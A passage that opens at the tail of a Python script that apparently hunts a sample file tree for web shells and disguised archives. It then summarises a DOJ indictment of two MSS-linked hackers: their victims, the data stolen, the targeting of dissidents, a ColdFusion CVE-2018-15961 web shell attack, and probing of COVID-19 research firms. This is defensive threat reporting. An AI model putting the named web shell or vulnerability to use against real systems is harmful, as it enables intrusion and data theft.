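    }
    for rel, body in files.items():
        target = base / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(body)


def run_demo():
    """Build the constructed tree in a temp dir, hunt it, and return the hits."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return hunt(tmp)


if __name__ == "__main__":
    for kind, paths in run_demo().items():
        print(kind)
        for p in paths:
            print("  ", p)
```

The extension-versus-magic mismatch is the durable half of this check: renaming an archive changes nothing about its first bytes, so the same test catches "RAR as image" staging wherever it is parked.  The web shell half is weaker by nature, since an operator can pick any name and obfuscate the body, which is why it is paired with a size cap and a content hint rather than relying on the names alone.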

The Victims 

The indictment makes clear that there were "hundreds" of victims between September of 2009 and early 2020, not only the ones listed in this indictment. To characterize the range of victims, they list types of companies, date ranges, amount of data stolen, and type of data gathered. 

Victim 1: California-based technology and defense firm
Dec 2014-Jan 2015
200GB "Radio, laser, and antennae technology; circuit board and related algorithms designs for advanced antennae; testing mechanisms and results."

Victim 2: Maryland-based technology and manufacturing firm - 64GB 

Victim 3: Hanford Site, Department of Energy, Washington State - information about network and personnel, including lists of authorized users and administrator accounts

Victim 4: Texas: 27GB of space and satellite application data 

Victim 5: Virginia Federal Defense contractor - 140GB of project files, drawings and documents related to Air Force and FBI investigations.  PII on 300+ employees

There were many more victims detailed, including:

  • a US educational software company with "millions of students and teachers' PII," breached from Nov 2018 to Feb 2019
  • a California pharmaceutical company - 105GB of data in Feb and March 2019
  • a Massachusetts medical device company - 83GB of source code, taken just as the victim was engaging in a contract with a Chinese firm to produce some of their components

Other victims were listed elsewhere in the indictment, including a large electronics firm in the Netherlands, a Swedish online gaming company (169GB of files including source code and player usernames and passwords), a Lithuanian gaming company, other companies in Germany, Belgium, and the Netherlands, an Australian defense contractor (320GB of data!), a South Korean shipbuilding company, an Australian solar energy company, a Spanish defense firm, and a UK AI firm focused on cancer research.

The Hackers' MSS Connection

The DOJ indictment mentions the Ministry of State Security 19 times, specifically referring to an unnamed "MSS Officer 1." 

"After stealing data and information from their victims and bringing that data and information back to China, Defendants then sold it for profit, or provided it to the MSS, including MSS Officer 1." 

"Li and Dong did not just hack for themselves. While in some instances they were stealing business and other information for their own profit, in others they were stealing information of obvious interest to the PRC Government's Ministry of State Security ("MSS"). LI and DONG worked with, were assisted by, and operated with the acquiescence of the MSS, including MSS Officer 1, who was assigned to the Guangdong regional division of the MSS (the Guangdong State Security Department, "GSSD"). 

"When stealing information of interest to the MSS, LI and DONG in most instances obtained that data through computer fraud against corporations and research institutions. For example, from victims including defense contractors in the US and abroad, they stole information regarding: military satellite programs; military wireless networks and communications systems; high powered microwave and laser systems; a counter-chemical weapons system; and ship-to-helicopter integration systems. 

In other instances, the Defendants provided the MSS with personal data, such as the passwords for personal email accounts belonging to individual Chinese dissidents including: 
  • a Hong Kong community organizer
  • the pastor of a Christian church in Xi'an
  • a dissident and former Tiananmen Square protestor
  • emails to and from the office of the Dalai Lama
  • emails belonging to a Chinese Christian "house" church pastor in Chengdu (who was later arrested)
  • emails from a US professor and organizer
  • two Canadian residents who advocate for freedom and democracy in Hong Kong
MSS Officer 1 assisted LI and other hackers.  When LI had difficulty compromising the mail server of a Burmese human rights group, MSS Officer 1 provided him with 0day malware for a popular browser which exploited a bug not known to the software vendor or security researchers.

MSS Officer 1 claimed to be a researcher at the "Guangdong Province International Affairs Research Center" but in fact was an intelligence officer working for the GSSD at Number 5, 6th Crossroad, Upper Nonglin Road, Yuexiu District, Guangzhou.

Example Tools and Techniques 

In several attacks in 2018, the attackers targeted a ColdFusion vulnerability published that year (CVE-2018-15961), attempting to gain access to CKEditor and the associated FileManager, using a ColdFusion web shell program named "cfm backdoor by ufo."  (This tool was actually used in a cool Canadian Government Training on APT groups, although in their training it was an Iranian hacker group using the tool.) 

In some cases, the hackers were clearly operating for personal profit, sometimes sending emails with subjects like "Source Code To Be Leaked!" and demanding a ransom payment to prevent publication of the victim's software.

COVID-19 Targeting

On January 25 and 27, 2020, Li searched for vulnerabilities at a Maryland biotech firm that had publicly announced its role in researching a potential COVID-19 vaccine.

On February 1, 2020, Li searched for vulnerabilities in the network of a California biotech firm that had announced the previous day they were researching antiviral drugs to treat COVID-19. 

On May 12, 2020, Li searched for vulnerabilities in the network of a California diagnostics company publicly known to be developing COVID-19 testing kits. 

On June 13, 2020, Li conducted reconnaissance related to a Virginia defense and cybersecurity contractor, Hong Kong protestors, a UK messaging app used by HK protestors, a webmail provider used by HK protestors, a Massachusetts biotech firm, and a California space flight firm.